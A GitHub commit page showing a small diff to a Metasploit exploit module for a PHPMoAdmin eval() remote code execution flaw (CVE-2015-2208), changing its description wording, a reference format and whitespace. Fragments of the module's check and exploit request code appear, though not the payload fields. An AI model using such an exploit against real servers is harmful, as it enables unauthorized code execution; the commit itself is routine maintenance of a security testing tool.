Skip to content

Commit 9530e15

Browse files
author
Ricardo Almeida
committed
Update phpmoadmin_exec.rb
Changes: Changed description section; Changed 'URL' to 'EDB' in references section; Added newline at the end.
1 parent c19895a commit 9530e15

File tree

1 file changed

+5
-4
lines changed

1 file changed

+5
-4
lines changed

modules/exploits/multi/http/phpmoadmin_exec.rb

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ def initialize(info = {})
1111
super(update_info(info,
1212
'Name' => 'PHPMoAdmin Remote Code Execution',
1313
'Description' => %q{
14-
This module exploits an arbitrary PHP command execution vulnerability because of a
14+
This module exploits an arbitrary PHP command execution vulnerability due to a
1515
dangerous use of eval() in PHPMoAdmin.
1616
},
1717
'Author' =>
@@ -23,7 +23,7 @@ def initialize(info = {})
2323
'References' =>
2424
[
2525
[ 'CVE', '2015-2208' ],
26-
[ 'URL', 'http://www.exploit-db.com/exploits/36251/' ],
26+
[ 'EDB', '36251' ],
2727
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
2828
[ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
2929
],
@@ -45,7 +45,7 @@ def initialize(info = {})
4545

4646
def check
4747
res = send_request_cgi({
48-
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
48+
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
4949
'method' => 'POST',
5050
'vars_post' =>
5151
{
@@ -65,7 +65,7 @@ def exploit
6565
print_status("Executing payload...")
6666

6767
res = send_request_cgi({
68-
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
68+
'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
6969
'method' => 'POST',
7070
'vars_post' =>
7171
{
@@ -78,3 +78,4 @@ def exploit
7878

7979
end
8080
end
81+

0 commit comments

Comments
 (0)